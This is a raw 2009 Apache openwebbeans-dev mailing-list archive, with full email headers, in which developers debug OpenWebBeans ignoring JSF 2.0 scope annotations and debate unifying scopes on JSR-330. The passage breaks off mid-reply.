h=Message-ID:X-YMail-OSG:Received:X-Mailer:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type:Content-Transfer-Encoding; b=DOvEERngIRrdS4+324KQQDnpMjLN12aWfRAH38ENiV91/2osFskxO8M4SINRlN2+tu8CYJglOibPGhw6E1KobAmCqjxCVvv6hkg1I2rgvYeZwnQLtTwW9G3BeSDUcdZ72pG/eo1aiFkDcuxdS9PLrA0RWIRetSJSmtZZUXGfo1I= DomainKey-Signature:a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.de; h=Message-ID:X-YMail-OSG:Received:X-Mailer:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type:Content-Transfer-Encoding; b=m7rZqWPFEyP6FVAGASNT4ao7gLkuguKS7bKVK342U5zxjdlMeP4auvfRiKyXRv9XjJRVvhkAumK+PN3TmexnoGvMtY+DkcLrUaLkB9NpNirZezrwkEo0yU5yLROB002m3rtEk9+zRC3Wb6ev0IFcjCv/ZMT7MPjPjTI2q7vjWXY=; Message-ID: <[email protected]> X-YMail-OSG: 6ou5a_oVM1nGd05.Q1rcwrsIXi5ObpVJRWT.jbX0qyuAVlCUEynA60dlkYp6H._wbl08Kj3qoMPoPPrRsGUxxjFk4osrf5WxrUjqoP76bDBm5D1.L2WzLE25bV0mFOcVFrbNlTVr8T3q1u_e2jUFT7pd3QSF6Zdfsyu.xpsHZQqoN_wX8YdlIFdcltYoqiu5km_meL5WDS57AgTyA.vQMDlZ_3_OTweLPeW4oRgYYOg.E6pgmt.8EyuEAgOFzkdam_4TmW_WpzyqrpLZdM7KlmSIjaX19EYudHmpkZLcVU7I_A4JlqxOo0uz8e1q3Qz2Az_t6Fp1zm3H6CprxX3QifsoXqjikw_DV4KCVFmGLSfBLF1.IllRJInwkHY.Ds4CykhYKXUYXPE.jS87U3yxW3JMYY.W Received: from [161.129.204.104] by web27804.mail.ukl.yahoo.com via HTTP; Wed, 26 Aug 2009 16:05:43 GMT X-Mailer: YahooMailClassic/6.1.2 YahooMailWebService/0.7.338.2 Date: Wed, 26 Aug 2009 16:05:43 +0000 (GMT) From: Mark Struberg <[email protected]> Subject: Re: WebBeans "eating" JSF 2.0 annotations ? To: [email protected] In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: quoted-printable X-Virus-Checked: Checked by ClamAV on apache.org Matze, =0AI think this would all become ok if _all_ the EE6 parts will simp= ly use the JSR-330 javax.inject.Scope annotation as basis for their scopes.= This would make at least the classpath scanning part a hell lot easier (th= e context implementation in the background still needs to be coded for each= DI part, because there is no API defined for it except in JSR-299).=0A=0A= =0AI already tried to convince Gavin and Pete to at least use @Scope for JS= R-299 scopes, but they refused so far. I hope that there will be a really w= ell founded _technical_ discussion on this topic in the very near future th= ough!=0A=0AMy 'vision':=0A=0A*) JSR-330 defines the basic annotations for D= I in Java generally=0A*) JSR-299 defines the annotations for EE related stu= ff (@SessionScoped, RequestScoped) BASED ON JSR-330!=0A*) JSF2 uses the @Se= ssionScoped from JSR-299. Why should JSF define own annotations? Even if yo= u don't like to use any 299 container, you may still use the annotations de= fined in the API and provide an own small DI like MyFaces does it right now= . Don't know if it makes sense at all to reinvite the wheel 10000 times... = ;)=0A=0A=0ALieGrue,=0Astrub=0A=0A--- On Wed, 8/26/09, Matthias Wessendorf <= [email protected]> wrote:=0A=0A> From: Matthias Wessendorf <[email protected]= rg>=0A> Subject: Re: WebBeans "eating" JSF 2.0 annotations ?=0A> To: openwe= [email protected]=0A> Date: Wednesday, August 26, 2009, 5:45 = PM=0A> On Wed, Aug 26, 2009 at 5:39 PM, Mark=0A> Struberg<[email protected]= >=0A> wrote:=0A> > In fact we (OWB) should provide standard context=0A> imp= lementations for JSF annotated scopes.=0A> >=0A> > The whole picture:=0A> >= =0A> > .) =A0JSF scanns the classpath for JSF annotations=0A> >=0A> > .) OW= B scanns the classpath for JSR-299 annotations=0A> >=0A> > In fact, I assum= e (not having looked at the code) that=0A> MyFaces provides kind of a mini = DI container in the EL code.=0A> So any EL which will get through to the fa= ces EL handler=0A> will successfully resolve those scoped beans=0A> >=0A> >= Otoh, OWB also provides an EL handler which is=0A> dominant (prior in the = EL chain). OWB currently simply=0A> ignores the javax.faces.scope annotatio= ns since they are=0A> 'unknown' for OWB. So this very class will look like = a bean=0A> which has no [email protected].=0A> >=0A> >=0A> > The problem a= rises latest if JSF scoped beans need to=0A> be injected into JSR-299 beans= and vice versa...=0A> >=0A> > an idea how to resolve this:=0A> > We need t= o provide context implementations for the=0A> faces scopes in the webbeans-= jsf module and let OWB do all=0A> the resolving.=0A> >=0A> > wdyt?=0A> =0A>= yes, that's true. It is really a PITA to have three=0A> different ways to= =0A> @inject stuff (in JavaEE - well the javax.faces.bean.**=0A> stuff is= =0A> optional)=0A> =0A> I am pretty sure this will actually cause lot's of = pain,=0A> trouble and=0A> bad blogs on JavaEE 6 (heck, deserved! :-) )=0A> = =0A> Are you able to bring this dilemma up on some EG ?=0A> (mismatch of al= l the stuff)=0A> =0A> -Matthias=0A> =0A> >=0A> > LieGrue,=0A> > strub=0A> >= =0A> >=0A> > --- On Wed, 8/26/09, Matthias Wessendorf <[email protected]>= =0A> wrote:=0A> >=0A> >> From: Matthias Wessendorf <[email protected]>=0A> = >> Subject: Re: WebBeans "eating" JSF 2.0 annotations=0A> ?=0A> >> To: open= [email protected]=0A> >> Date: Wednesday, August 26, 2009, = 5:26 PM=0A> >> On Wed, Aug 26, 2009 at 5:23 PM,=0A> >> Matthias Wessendorf<= [email protected]>=0A> >> wrote:=0A> >> > On Wed, Aug 26, 2009 at 5:17 PM, = Mark=0A> Struberg<[email protected]>=0A> >> wrote:=0A> >> >> for what I kno= w (discussion on wb-dev)=0A> JSF apps=0A> >> should use JSR-299 @ScopeType = annotated scopes=0A> (renamed to=0A> >> @NormalScope in the latest spec) an= d not faces=0A> scopes. I did=0A> >> hope that we could unify all scopes by= generally=0A> using=0A> >> JSR-330 javax.inject.Scope in all EE fields. Bu= t=0A> that will=0A> >> not work until JSR-299 also recognizes and treats=0A= > JSR-330=0A> >> scopes as normal scopes.=0A> >> >>=0A> >> >=0A> >> > WTF ?= :)=0A> >> >=0A> >> > It is kinda odd that JSF 2.0 has should use=0A> the 2= 99=0A> >> stuff. Standalone,=0A> >> > ok all fine (not tested).=0A> >> > Bu= t even if there are both in the game jsf2.0=0A> and 299,=0A> >> they should= =0A> >> > just work (or at least I should=0A> >> > get a warning that the b= ean is using a (good)=0A> -sorry-=0A> >> incorrect... annotation.=0A> >> >= =0A> >> > Basically this is a total mess. Annontations=0A> work=0A> >> stan= dalone, but not=0A> >> > when adding some heavyweight=0A> >> > stuff (like = 299) to the game ? Oh boy...=0A> >>=0A> >> I am pretty sure that this will = introcude a lot of=0A> fun to=0A> >> folks=0A> >> writing JSF 2.0 applicati= ons,=0A> >> if your statement is true. That would worse than=0A> the JSP=0A= > >> 2.1=0A> >> dependency (with JSF 1.2)=0A> >>=0A> >> I filed this bug:= =0A> >> https://issues.apache.org/jira/browse/OWB-133=0A> >>=0A> >> At leas= t there should be some help. Not everybody=0A> is=0A> >> thrilled to=0A> >>= replace annotations based on=0A> >> the environment (at least not me)=0A> = >>=0A> >> >=0A> >> > -Matthias=0A> >> >=0A> >> >> LieGrue,=0A> >> >> strub= =0A> >> >>=0A> >> >>=0A> >> >> --- On Wed, 8/26/09, Matthias Wessendorf=0A>= <[email protected]>=0A> >> wrote:=0A> >> >>=0A> >> >>> From: Matthias Wess= endorf <[email protected]>=0A> >> >>> Subject: Re: WebBeans "eating" JSF=0A= > 2.0=0A> >> annotations ?=0A> >> >>> To: [email protected]= .org=0A> >> >>> Date: Wednesday, August 26, 2009,=0A> 5:11 PM=0A> >> >>> ha= s no effect. The beast can't find=0A> >> >>> the JSF beans.=0A> >> >>> Due = to lack of time, I am going with=0A> JSF 2.0=0A> >> standalone.=0A> >> >>>= =0A> >> >>> Question is: as it was working the=0A> current=0A> >> behavior = is a=0A> >> >>> regression,=0A> >> >>> has there been any testing on OBW += =0A> JSF 2.0 ?=0A> >> >>>=0A> >> >>> -Matthias=0A> >> >>>=0A> >> >>> On Wed= , Aug 26, 2009 at 3:45 PM,=0A> Gurkan=0A> >> Erdogdu<[email protected]= om>=0A> >> >>> wrote:=0A> >> >>> > It must not eat.=0A> >> >>> >=0A> >> >>>= > But one point,=0A> >> >>> >=0A> >> >>> > You still use old XML=0A> confi= guration file=0A> >> format. As a=0A> >> >>> default OWB uses new=0A> >> >>= > > XML format. Add=0A> >> >>> > https://svn.apache.org/repos/asf/incubator= /openwebbeans/trunk/samples/guess/src/main/resources/META-INF/openwebbeans/= openwebbeans.properties=0A> >> >>> >=0A> >> >>> > in your project=0A> >> re= sources/META-INF/openwebbeans folder=0A> >> >>> and sure that all=0A> >> >>= > > libraries are ok.=0A> >> >>> >=0A> >> >>> > You can look necessary libs= =0A> from=0A> >> guess.war . You can=0A> >> >>> create it from mvn=0A> >> >= >> > package -Pjetty.=0A> >> >>> >=0A> >> >>> > --Gurkan=0A> >> >>> >=0A> >= > >>> >=0A> >> >>> > 2009/8/26 Matthias Wessendorf=0A> <[email protected]>= =0A> >> >>> >=0A> >> >>> >> Hi,=0A> >> >>> >>=0A> >> >>> >> is it possible = that the=0A> current trunk=0A> >> is _eating_=0A> >> >>> JSF 2.0 annotation= s ?=0A> >> >>> >>=0A> >> >>> >> <someCode>=0A> >> >>> >> ...=0A> >> >>> >> = import=0A> javax.faces.bean.ManagedBean;=0A> >> >>> >> import=0A> >> javax.= faces.bean.SessionScoped;=0A> >> >>> >>=0A> >> >>> >>=0A> @ManagedBean(name= =3D"playersBean")=0A> >> >>> >> @SessionScoped=0A> >> >>> >> public class V= iewParamsBean=0A> >> >>> >> {=0A> >> >>> >> ...=0A> >> >>> >> </someCode>= =0A> >> >>> >>=0A> >> >>> >> In June (before reflecting=0A> the=0A> >> >>> = javax.enterprise.context changes) it=0A> was=0A> >> >>> >> working.=0A> >> = >>> >> Now expressions like=0A> #{playersBean}=0A> >> are simply=0A> >> >>>= ignored ;-)=0A> >> >>> >>=0A> >> >>> >> Demo project is here:=0A> >> >>> >= > https://facesgoodies.googlecode.com/svn/CGN/trunk/=0A> >> >>> >>=0A> >> >= >> >> -Matthias=0A> >> >>> >>=0A> >> >>> >>=0A> >> >>> >> --=0A> >> >>> >> = Matthias Wessendorf=0A> >> >>> >>=0A> >> >>> >> blog: http://matthiaswessen= dorf.wordpress.com/=0A> >> >>> >> sessions: http://www.slideshare.net/mwess= endorf=0A> >> >>> >> twitter: http://twitter.com/mwessendorf=0A> >> >>> >>= =0A> >> >>> >=0A> >> >>> >=0A> >> >>> >=0A> >> >>> > --=0A> >> >>> > Gurkan= Erdogdu=0A> >> >>> > http://gurkanerdogdu.blogspot.com=0A> >> >>> >=0A> >>= >>>=0A> >> >>>=0A> >> >>>=0A> >> >>> --=0A> >> >>> Matthias Wessendorf=0A>= >> >>>=0A> >> >>> blog: http://matthiaswessendorf.wordpress.com/=0A> >> >>= > sessions: http://www.slideshare.net/mwessendorf=0A> >> >>> twitter: http:= //twitter.com/mwessendorf=0A> >> >>>=0A> >> >>=0A> >> >>=0A> >> >>=0A> >> >= >=0A> >> >=0A> >> >=0A> >> >=0A> >> > --=0A> >> > Matthias Wessendorf=0A> >= > >=0A> >> > blog: http://matthiaswessendorf.wordpress.com/=0A> >> > sessio= ns: http://www.slideshare.net/mwessendorf=0A> >> > twitter: http://twitter.= com/mwessendorf=0A> >> >=0A> >>=0A> >>=0A> >>=0A> >> --=0A> >> Matthias Wes= sendorf=0A> >>=0A> >> blog: http://matthiaswessendorf.wordpress.com/=0A> >>= sessions: http://www.slideshare.net/mwessendorf=0A> >> twitter: http://twi= tter.com/mwessendorf=0A> >>=0A> >=0A> >=0A> >=0A> >=0A> =0A> =0A> =0A> -- = =0A> Matthias Wessendorf=0A> =0A> blog: http://matthiaswessendorf.wordpress= .com/=0A> sessions: http://www.slideshare.net/mwessendorf=0A> twitter: http= ://twitter.com/mwessendorf=0A> =0A=0A=0A From [email protected] Wed Aug 26 16:10:12 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 97692 invoked from network); 26 Aug 2009 16:10:12 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 26 Aug 2009 16:10:12 -0000 Received: (qmail 59961 invoked by uid 500); 26 Aug 2009 16:10:12 -0000 Delivered-To: [email protected] Received: (qmail 59931 invoked by uid 500); 26 Aug 2009 16:10:12 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 59921 invoked by uid 99); 26 Aug 2009 16:10:12 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 26 Aug 2009 16:10:12 +0000 X-ASF-Spam-Status: No, hits=1.2 required=10.0 tests=SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO web27804.mail.ukl.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Wed, 26 Aug 2009 16:09:59 +0000 Received: (qmail 17526 invoked by uid 60001); 26 Aug 2009 16:09:38 -0000 DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=yahoo.de; s=s1024; t=1251302978; bh=pSIWosfNV5CHlHr9sWceYFiLE8lwjXKjSck32L9t+3M=; h=Message-ID:X-YMail-OSG:Received:X-Mailer:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type:Content-Transfer-Encoding; b=vDgzPsg6l4GRDTiiukx3D7z7+0OSQkcwrce/UkoarzXQqrvP/5MDRLPFndQ5k3GNHZtMSy9wOuiXlQpgImK9vpVTXxYgcHrcqg528Dv49E8B8ryWppBTMJAEsxcfAm4+F9Y+qyHkpkU7MSmKHt2yKG8BsjwUUWPuvlugOcsVvUo= DomainKey-Signature:a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.de; h=Message-ID:X-YMail-OSG:Received:X-Mailer:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type:Content-Transfer-Encoding; b=ITRUtXKDsAx8jMukKUqV8bDWyPkdEoJyHG1L4+XZsDBz65hRO2H1O2DudRk9+8HqNuN6goKNB6s3VXI6i3lXQCIbt2xJcKv5tvdGrjc2gagZ8n35ps0KI+6DtZQdVfjmkL913VA4BZk3m9uLUYfuC/L15Up/yCM4//FK6JOQ0vs=; Message-ID: <[email protected]> X-YMail-OSG: HNRxRKgVM1m1e1BZ_peZpsGVOdC9t.ElUEQVRcif2DELr9XeR8JwVbIqXdkFwI3D23rPXyPHZiKfG3RnQeKHMuzdEy1blSIJ4t4gDsW_5rliVEcPzRDG8fw.NunqpFT32VKohe9lixC2jNcjgra0A15dcqGgV41z3QNjJukhJQBvx5zF68uEiI5mKvqLAr53juvC92H60JAJjUdHmHG3xTcZOajTFh8rXwWIarPHkX78i8VzMIWKPuLcwtPUUpMUTD8HApCC4WJ8XoWFR061mDEgOzPfCQvhCFOMZDtO35fGyj3lRTDFWoebZ0ReK2UHeirAmQIMF7q3g3H6BKbShqiHLNgmPsB1HNJVxj3CEj2iPjAflExWVjASBE5omA.jZ2A8bOnz Received: from [161.129.204.104] by web27804.mail.ukl.yahoo.com via HTTP; Wed, 26 Aug 2009 16:09:38 GMT X-Mailer: YahooMailClassic/6.1.2 YahooMailWebService/0.7.338.2 Date: Wed, 26 Aug 2009 16:09:38 +0000 (GMT) From: Mark Struberg <[email protected]> Subject: Re: WebBeans "eating" JSF 2.0 annotations ? To: [email protected] In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: quoted-printable X-Virus-Checked: Checked by ClamAV on apache.org are you running this from the commandline or from within eclipse?=0A=0AI kn= ow that m2eclipse handles the classpath providing a bit different...=0A=0AL= ieGrue,=0Astrub=0A=0A--- On Wed, 8/26/09, Matthias Wessendorf <matzew@apach= e.org> wrote:=0A=0A> From: Matthias Wessendorf <[email protected]>=0A> Subj= ect: Re: WebBeans "eating" JSF 2.0 annotations ?=0A> To: openwebbeans-dev@i= ncubator.apache.org=0A> Date: Wednesday, August 26, 2009, 5:57 PM=0A> mvn j= etty:run-exploded fixes that. I=0A> guess that's JSF's problem (I am=0A> cu= rrently using the RI)=0A> =0A> Oh boy! :)=0A> =0A> On Wed, Aug 26, 2009 at = 5:45 PM, Matthias Wessendorf<[email protected]>=0A> wrote:=0A> > On Wed, Au= g 26, 2009 at 5:39 PM, Mark Struberg<[email protected]>=0A> wrote:=0A> >> I= n fact we (OWB) should provide standard context=0A> implementations for JSF= annotated scopes.=0A> >>=0A> >> The whole picture:=0A> >>=0A> >> .) =A0JSF= scanns the classpath for JSF annotations=0A> >>=0A> >> .) OWB scanns the c= lasspath for JSR-299=0A> annotations=0A> >>=0A> >> In fact, I assume (not h= aving looked at the code)=0A> that MyFaces provides kind of a mini DI conta= iner in the EL=0A> code. So any EL which will get through to the faces EL= =0A> handler will successfully resolve those scoped beans=0A> >>=0A> >> Oto= h, OWB also provides an EL handler which is=0A> dominant (prior in the EL c= hain). OWB currently simply=0A> ignores the javax.faces.scope annotations s= ince they are=0A> 'unknown' for OWB. So this very class will look like a be= an=0A> which has no [email protected].=0A> >>=0A> >>=0A> >> The problem ar= ises latest if JSF scoped beans need=0A> to be injected into JSR-299 beans = and vice versa...=0A> >>=0A> >> an idea how to resolve this:=0A> >> We need= to provide context implementations for the=0A> faces scopes in the webbean= s-jsf module and let OWB do all=0A> the resolving.=0A> >>=0A> >> wdyt?=0A> = >=0A> > yes, that's true. It is really a PITA to have three=0A> different w= ays to=0A> > @inject stuff (in JavaEE - well the=0A> javax.faces.bean.** st= uff is=0A> > optional)=0A> >=0A> > I am pretty sure this will actually caus= e lot's of=0A> pain, trouble and=0A> > bad blogs on JavaEE 6 (heck, deserve= d! :-) )=0A> >=0A> > Are you able to bring this dilemma up on some EG ?=0A>= > (mismatch of all the stuff)=0A> >=0A> > -Matthias=0A> >=0A> >>=0A> >> Li= eGrue,=0A> >> strub=0A> >>=0A> >>=0A> >> --- On Wed, 8/26/09, Matthias Wess= endorf <[email protected]>=0A> wrote:=0A> >>=0A> >>> From: Matthias Wessend= orf <[email protected]>=0A> >>> Subject: Re: WebBeans "eating" JSF 2.0=0A> = annotations ?=0A> >>> To: [email protected]=0A> >>> Dat= e: Wednesday, August 26, 2009, 5:26 PM=0A> >>> On Wed, Aug 26, 2009 at 5:23= PM,=0A> >>> Matthias Wessendorf<[email protected]>=0A> >>> wrote:=0A> >>> = > On Wed, Aug 26, 2009 at 5:17 PM, Mark=0A> Struberg<[email protected]>=0A>= >>> wrote:=0A> >>> >> for what I know (discussion on=0A> wb-dev) JSF apps= =0A> >>> should use JSR-299 @ScopeType annotated scopes=0A> (renamed to=0A>= >>> @NormalScope in the latest spec) and not faces=0A> scopes. I did=0A> >= >> hope that we could unify all scopes by=0A> generally using=0A> >>> JSR-3= 30 javax.inject.Scope in all EE fields.=0A> But that will=0A> >>> not work = until JSR-299 also recognizes and=0A> treats JSR-330=0A> >>> scopes as norm= al scopes.=0A> >>> >>=0A> >>> >=0A> >>> > WTF ? :)=0A> >>> >=0A> >>> > It i= s kinda odd that JSF 2.0 has should=0A> use the 299=0A> >>> stuff. Standalo= ne,=0A> >>> > ok all fine (not tested).=0A> >>> > But even if there are bot= h in the game=0A> jsf2.0 and 299,=0A> >>> they should=0A> >>> > just work (= or at least I should=0A> >>> > get a warning that the bean is using a=0A> (= good) -sorry-=0A> >>> incorrect... annotation.=0A> >>> >=0A> >>> > Basicall= y this is a total mess.=0A> Annontations work=0A> >>> standalone, but not= =0A> >>> > when adding some heavyweight=0A> >>> > stuff (like 299) to the g= ame ? Oh boy...=0A> >>>=0A> >>> I am pretty sure that this will introcude a= =0A> lot of fun to=0A> >>> folks=0A> >>> writing JSF 2.0 applications,=0A> = >>> if your statement is true. That would worse=0A> than the JSP=0A> >>> 2.= 1=0A> >>> dependency (with JSF 1.2)=0A> >>>=0A> >>> I filed this bug:=0A> >= >> https://issues.apache.org/jira/browse/OWB-133=0A> >>>=0A> >>> At least t= here should be some help. Not=0A> everybody is=0A> >>> thrilled to=0A> >>> = replace annotations based on=0A> >>> the environment (at least not me)=0A> = >>>=0A> >>> >=0A> >>> > -Matthias=0A> >>> >=0A> >>> >> LieGrue,=0A> >>> >> = strub=0A> >>> >>=0A> >>> >>=0A> >>> >> --- On Wed, 8/26/09, Matthias=0A> We= ssendorf <[email protected]>=0A> >>> wrote:=0A> >>> >>=0A> >>> >>> From: Ma= tthias Wessendorf <[email protected]>=0A> >>> >>> Subject: Re: WebBeans "ea= ting"=0A> JSF 2.0=0A> >>> annotations ?=0A> >>> >>> To: openwebbeans-dev@in= cubator.apache.org=0A> >>> >>> Date: Wednesday, August 26, 2009,=0A> 5:11 P= M=0A> >>> >>> has no effect. The beast can't=0A> find=0A> >>> >>> the JSF b= eans.=0A> >>> >>> Due to lack of time, I am going=0A> with JSF 2.0=0A> >>> = standalone.=0A> >>> >>>=0A> >>> >>> Question is: as it was working=0A> the = current=0A> >>> behavior is a=0A> >>> >>> regression,=0A> >>> >>> has there= been any testing on OBW=0A> + JSF 2.0 ?=0A> >>> >>>=0A> >>> >>> -Matthias= =0A> >>> >>>=0A> >>> >>> On Wed, Aug 26, 2009 at 3:45 PM,=0A> Gurkan=0A> >>= > Erdogdu<[email protected]>=0A> >>> >>> wrote:=0A> >>> >>> > It mus= t not eat.=0A> >>> >>> >=0A> >>> >>> > But one point,=0A> >>> >>> >=0A> >>>= >>> > You still use old XML=0A> configuration file=0A> >>> format. As a=0A= > >>> >>> default OWB uses new=0A> >>> >>> > XML format. Add=0A> >>> >>> > = https://svn.apache.org/repos/asf/incubator/openwebbeans/trunk/samples/guess= /src/main/resources/META-INF/openwebbeans/openwebbeans.properties=0A> >>> >= >> >=0A> >>> >>> > in your project=0A> >>> resources/META-INF/openwebbeans = folder=0A> >>> >>> and sure that all=0A> >>> >>> > libraries are ok.=0A> >>= > >>> >=0A> >>> >>> > You can look necessary libs=0A> from=0A> >>> guess.wa= r . You can=0A> >>> >>> create it from mvn=0A> >>> >>> > package -Pjetty.= =0A> >>> >>> >=0A> >>> >>> > --Gurkan=0A> >>> >>> >=0A> >>> >>> >=0A> >>> >= >> > 2009/8/26 Matthias=0A> Wessendorf <[email protected]>=0A> >>> >>> >=0A= > >>> >>> >> Hi,=0A> >>> >>> >>=0A> >>> >>> >> is it possible that the=0A> = current trunk=0A> >>> is _eating_=0A> >>> >>> JSF 2.0 annotations ?=0A> >>>= >>> >>=0A> >>> >>> >> <someCode>=0A> >>> >>> >> ...=0A> >>> >>> >> import= =0A> javax.faces.bean.ManagedBean;=0A> >>> >>> >> import=0A> >>> javax.face= s.bean.SessionScoped;=0A> >>> >>> >>=0A> >>> >>> >>=0A> @ManagedBean(name= =3D"playersBean")=0A> >>> >>> >> @SessionScoped=0A> >>> >>> >> public class= =0A> ViewParamsBean=0A> >>> >>> >> {=0A> >>> >>> >> ...=0A> >>> >>> >> </so= meCode>=0A> >>> >>> >>=0A> >>> >>> >> In June (before=0A> reflecting the=0A= > >>> >>> javax.enterprise.context changes)=0A> it was=0A> >>> >>> >> worki= ng.=0A> >>> >>> >> Now expressions like=0A> #{playersBean}=0A> >>> are simp= ly=0A> >>> >>> ignored ;-)=0A> >>> >>> >>=0A> >>> >>> >> Demo project is he= re:=0A> >>> >>> >> https://facesgoodies.googlecode.com/svn/CGN/trunk/=0A> >= >> >>> >>=0A> >>> >>> >> -Matthias=0A> >>> >>> >>=0A> >>> >>> >>=0A> >>> >>= > >> --=0A> >>> >>> >> Matthias Wessendorf=0A> >>> >>> >>=0A> >>> >>> >> bl= og: http://matthiaswessendorf.wordpress.com/=0A> >>> >>> >> sessions: http:= //www.slideshare.net/mwessendorf=0A> >>> >>> >> twitter: http://twitter.com= /mwessendorf=0A> >>> >>> >>=0A> >>> >>> >=0A> >>> >>> >=0A> >>> >>> >=0A> >= >> >>> > --=0A> >>> >>> > Gurkan Erdogdu=0A> >>> >>> > http://gurkanerdogdu= .blogspot.com=0A> >>> >>> >=0A> >>> >>>=0A> >>> >>>=0A> >>> >>>=0A> >>> >>>= --=0A> >>> >>> Matthias Wessendorf=0A> >>> >>>=0A> >>> >>> blog: http://ma= tthiaswessendorf.wordpress.com/=0A> >>> >>> sessions: http://www.slideshare= .net/mwessendorf=0A> >>> >>> twitter: http://twitter.com/mwessendorf=0A> >>= > >>>=0A> >>> >>=0A> >>> >>=0A> >>> >>=0A> >>> >>=0A> >>> >=0A> >>> >=0A> >= >> >=0A> >>> > --=0A> >>> > Matthias Wessendorf=0A> >>> >=0A> >>> > blog: h= ttp://matthiaswessendorf.wordpress.com/=0A> >>> > sessions: http://www.slid= eshare.net/mwessendorf=0A> >>> > twitter: http://twitter.com/mwessendorf=0A= > >>> >=0A> >>>=0A> >>>=0A> >>>=0A> >>> --=0A> >>> Matthias Wessendorf=0A> = >>>=0A> >>> blog: http://matthiaswessendorf.wordpress.com/=0A> >>> sessions= : http://www.slideshare.net/mwessendorf=0A> >>> twitter: http://twitter.com= /mwessendorf=0A> >>>=0A> >>=0A> >>=0A> >>=0A> >>=0A> >=0A> >=0A> >=0A> > --= =0A> > Matthias Wessendorf=0A> >=0A> > blog: http://matthiaswessendorf.word= press.com/=0A> > sessions: http://www.slideshare.net/mwessendorf=0A> > twit= ter: http://twitter.com/mwessendorf=0A> >=0A> =0A> =0A> =0A> -- =0A> Matthi= as Wessendorf=0A> =0A> blog: http://matthiaswessendorf.wordpress.com/=0A> s= essions: http://www.slideshare.net/mwessendorf=0A> twitter: http://twitter.= com/mwessendorf=0A> =0A=0A=0A From [email protected] Wed Aug 26 16:11:02 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 98053 invoked from network); 26 Aug 2009 16:11:02 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 26 Aug 2009 16:11:02 -0000 Received: (qmail 60944 invoked by uid 500); 26 Aug 2009 16:11:02 -0000 Delivered-To: [email protected] Received: (qmail 60913 invoked by uid 500); 26 Aug 2009 16:11:02 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 60896 invoked by uid 99); 26 Aug 2009 16:11:02 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 26 Aug 2009 16:11:02 +0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-ew0-f208.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 26 Aug 2009 16:10:49 +0000 Received: by ewy4 with SMTP id 4so331223ewy.27 for <[email protected]>; Wed, 26 Aug 2009 09:10:29 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:sender:received:in-reply-to :references:date:x-google-sender-auth:message-id:subject:from:to :content-type:content-transfer-encoding; bh=1520/wReUY4JBD3pDWRjR2T54Ryhr/KaL73etUWGhRQ=; b=R/EWtr3LrqN9ATSOI+M3uAe3ueCZ7yZJkbbVtqUe5ywmr/pSpd3Hy6A04BQPN42eFL H+LPY1PaLK9edJQpah5JI49sZBHt+n75tIKVKfwNfAv/3pHp0earfJhy1PQEB4J6OIGt CYVYgGcp+oteF1xe/Yv7WEjYjnqSnCWhnH/Dg= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:sender:in-reply-to:references:date :x-google-sender-auth:message-id:subject:from:to:content-type :content-transfer-encoding; b=Z+9VkWjuGFqrr4sFxiIKaqldERyUq1l7027DkvpDOBNVNIOTsM+VWGMuU8143dNk0f ThQR1fsj1rZLD9DaW+vmeGtWDjl52+XJ2dy7GFslRr5nIPVWXmB4TYFNk4WO2KJvIatE TzSnPNJJlddoJpeA8eM7R03cSeEBnGhm7Roww= MIME-Version: 1.0 Sender: [email protected] Received: by 161.129.204.104 with SMTP id a4mr8336414eba.37.1251303029421; Wed, 26 Aug 2009 09:10:29 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> Date: Wed, 26 Aug 2009 18:10:29 +0200 X-Google-Sender-Auth: 0ab148b00248b258 Message-ID: <[email protected]> Subject: Re: WebBeans "eating" JSF 2.0 annotations ? From: Matthias Wessendorf <[email protected]> To: [email protected] Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable X-Virus-Checked: Checked by ClamAV on apache.org On Wed, Aug 26, 2009 at 6:05 PM, Mark Struberg<[email protected]> wrote: > Matze, > I think this would all become ok if _all_ the EE6 parts will simply use t= he JSR-330 javax.inject.Scope annotation as basis for their scopes. +1 > This would make at least the classpath scanning part a hell lot easier (t= he context implementation in the background still needs to be coded for eac= h DI part, > because there is no API defined for it except in JSR-299). I agree > > > I already tried to convince 